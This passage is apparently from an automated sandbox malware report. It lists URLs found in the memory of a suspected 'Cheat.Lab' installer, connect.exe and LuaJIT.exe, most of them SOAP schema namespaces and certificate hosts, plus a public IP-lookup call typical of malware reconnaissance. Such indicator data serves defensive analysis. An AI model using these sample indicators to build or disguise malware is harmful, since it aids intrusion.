                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                    Source: LuaJIT.exe, 00000009.00000002.1936998576.0000022EB34A5000.00000004.00000020.00020000.00000000.sdmp, LuaJIT.exe, 00000009.00000002.1936998576.0000022EB344D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=query
                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.drString found in binary or memory: http://ocsp.digicert.com0O
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.drString found in binary or memory: http://t2.symcb.com0
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002C5D000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                    Source: connect.exe, 00000016.00000002.2133528800.000000000288A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002C75000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3ResponseD
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                    Source: connect.exe, 00000016.00000002.2133528800.00000000027F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.drString found in binary or memory: http://tl.symcb.com/tl.crl0
                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.drString found in binary or memory: http://tl.symcb.com/tl.crt0
                    Source: Cheat.Lab.2.7.2.msi, MSIC01A.tmp.2.dr, MSIBEB1.tmp.2.dr, MSIAC8E.tmp.0.dr, MSIBE32.tmp.2.dr, MSIBDB3.tmp.2.dr, MSIAC3E.tmp.0.dr, 66bc0d.rbs.2.dr, MSIACBE.tmp.0.dr, MSIBE81.tmp.2.dr, MSIAD1D.tmp.0.dr, MSIBD45.tmp.2.dr, MSIAC5E.tmp.0.dr, MSID74E.tmp.0.dr, MSIBF2F.tmp.2.dr, MSIBE12.tmp.2.dr, MSIAEF5.tmp.0.dr, MSICA9B.tmp.2.dr, MSID76E.tmp.0.dr, MSIAEC5.tmp.0.dr, MSIAEA5.tmp.0.drString found in binary or memory: http://tl.symcd.com0&
